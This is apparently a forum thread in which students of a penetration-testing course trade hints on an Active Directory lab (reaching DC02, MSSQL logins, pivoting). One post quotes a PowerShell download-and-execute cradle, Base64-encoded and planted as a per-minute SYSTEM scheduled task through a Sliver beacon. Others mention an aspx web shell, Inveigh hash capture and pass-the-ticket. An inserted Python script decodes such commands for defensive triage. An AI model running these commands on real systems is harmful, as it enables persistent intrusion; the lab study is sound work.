I’ve been stuck on trying to access DC02 for days now. Anyone willing to give me a tip? I’ve rooted the foothold host and pulled all the hashes I could find. Got access to the Admin account, but it’s only the local admin. Can’t seem to gain access to the one I need to get to DC02.
I’m stuck in the same place. Have you figured it out yet?
I haven’t reached the Skills Assessment yet. I am lost in the “Assumed breach” section, “Establishing persistence” part.
It says “We will focus on the approach used in the Probing the surface section by downloading a staged.txt file”
[!bash!]$ echo -en "iex(new-object net.webclient).downloadString('http://10.10.14.62:8088/stager.txt')" | iconv -t UTF-16LE | base64 -w 0
aQBlAHgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADYAMgA6ADgAMAA4ADgALwBzAHQAYQBnAGUAcgAuAHQAeAB0ACcAKQA=
And then create a scheduled task like this:
sliver (http-beacon) > execute powershell 'schtasks /create /sc minute /mo 1 /tn SecurityUpdater /tr \"powershell.exe -enc aQBlAHgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADYAMgA6ADgAMAA4ADgALwBzAHQAYQBnAGUAcgAuAHQAeAB0ACcAKQA=\" /ru SYSTEM'
I did as was written but never got a shell back. Please help!
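For anyone reviewing scheduled-task command lines like the one quoted above from the defensive side, here is an added example (not part of the thread or the course material) that decodes a `-enc` argument from UTF-16LE Base64 and flags download-cradle keywords. The sample task line, the 192.0.2.10 address and all function names are constructed for illustration.

```python
import base64
import binascii
import re

# powershell.exe accepts any prefix of -EncodedCommand (-e, -en, -enc, ...) and the -ec alias.
FLAG_RE = re.compile(r"(?<!\S)[-/](e[a-z]*)\s+[\"']?([A-Za-z0-9+/]{8,}={0,2})", re.I)
CRADLE_RE = re.compile(
    r"\b(iex|invoke-expression|downloadstring|downloadfile|net\.webclient|invoke-webrequest)\b",
    re.I,
)
URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)

def is_encoded_flag(flag):
    f = flag.lower()
    return f == "ec" or "encodedcommand".startswith(f)

def decode_encoded_command(cmdline):
    """Return the script hidden behind -enc/-EncodedCommand, or None if absent."""
    for m in FLAG_RE.finditer(cmdline):
        if not is_encoded_flag(m.group(1)):
            continue  # e.g. -ExecutionPolicy also starts with "e"
        try:
            raw = base64.b64decode(m.group(2), validate=True)
            return raw.decode("utf-16-le")  # PowerShell expects UTF-16LE text
        except (binascii.Error, UnicodeDecodeError):
            continue
    return None

def triage(cmdline):
    """Decode an encoded command and list the cradle keywords and URLs inside it."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return None
    indicators = sorted({hit.lower() for hit in CRADLE_RE.findall(script)})
    return {"script": script, "indicators": indicators, "urls": URL_RE.findall(script)}

# Constructed sample data: same shape as the task in the post, documentation-range IP.
SAMPLE_SCRIPT = "iex(new-object net.webclient).downloadString('http://192.0.2.10:8088/stager.txt')"
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_TASK = (
    "schtasks /create /sc minute /mo 1 /tn SecurityUpdater "
    f'/tr "powershell.exe -enc {SAMPLE_B64}" /ru SYSTEM'
)
BENIGN_TASK = r"powershell.exe -ExecutionPolicy Unrestricted -File C:\Scripts\backup.ps1"

if __name__ == "__main__":
    print(triage(SAMPLE_TASK))
    print(triage(BENIGN_TASK))
```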
If anyone needs help to get the third flag, feel free to hit me up.
I’m stuck at the last. If anyone has a hint, I’d appreciate it.
PS: I got it. It took me direct access to the host via a pivot. You can also achieve it by generating a file and PtT.
Bro, can you give a hint to get a foothold from htb-student? lol, I am stuck at the beginning, tried everything.
Run SharpHound.
Bro, I’m stuck at the 3rd question. Can you help me, like how did you pivot to DC02?
Can you give a hint please?
Did you find the script?
Yeah, and I logged in to the MSSQL server, but I am having an error: when I am trying to upload a file to the MSSQL server, it freezes.
Bro, I already got DC02 but can’t dump hashes. I always get an error like implant timeout, and after that the session closes by itself.
Same as well. It’s my second day of trying to get a foothold. I tried everything and I’m getting a runtime error whenever I visit the aspx shell in the uploads directory. I tried everything possible, please help, anybody.
With mssqlclient.py I am getting a login error for felipe without -windows-auth, and with -windows-auth “The login is from an untrusted domain and cannot be used with Integrated authentication”. Any hints?
I’m stuck on the third flag, please help lol!
At which part specifically?
Can’t figure out how to get to the domain controller, BloodHound doesn’t show a route.
I tried running Inveigh to get the NTLMv2 hash, but I’m not getting anything, not sure if this is the correct route.
Have you found the PS1 script with the MSSQL user credentials?
No, I haven’t. I logged in as the administrator, but didn’t see a PowerShell script.
Check “C:\Users\Administrator\Automation_Project”